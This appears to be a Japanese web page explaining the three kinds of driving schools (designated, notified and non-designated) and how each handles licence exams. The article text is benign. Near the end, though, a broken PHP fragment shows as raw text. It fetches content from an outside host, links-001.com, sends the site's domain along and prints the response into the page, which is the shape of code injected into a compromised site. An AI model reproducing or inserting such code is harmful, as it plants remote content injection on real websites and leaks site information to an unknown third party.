自動車学校の種類とその特徴について

自動車学校

自動車学校の種類とその特徴について

自動車学校には主に3つの区分に分けられています。
「指定自動車教習所」と「届出自動車教習所」そして「指定外自動車教習所」の3つです。
それぞれどんな違いがあるのか確認しましょう。
「指定自動車教習所」公安委員会の指定を受けた教習所の事で、一般的に自動車学校と言った場合これを指す事が多いです。
仮免許技能試験と学科試験を教習所内で実施し、本免許技能試験は路上で行います。
よって本免許学科試験のみを、試験場に出向いて行なう事となります。
卒業検定に合格した受講者に発行される卒業証明書を試験場に持参する事で、技能試験が免除される場合がほとんどです。
「届出自動車教習所」公安委員会に届出を提出している教習所の事を指します。
検定や仮免許試験の実施が認められていないので、受講生が自分で試験場まで行き技能試験などを受ける必要があります。
主に運転に自信のある人や、免許の取り消しにあった人が利用する傾向があります。
「指定外自動教習所」公安委員会の監督を受けていない教習所です。
運転の練習が目的とされ、ペーパードライバー講習などが多い利用法です。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

最新投稿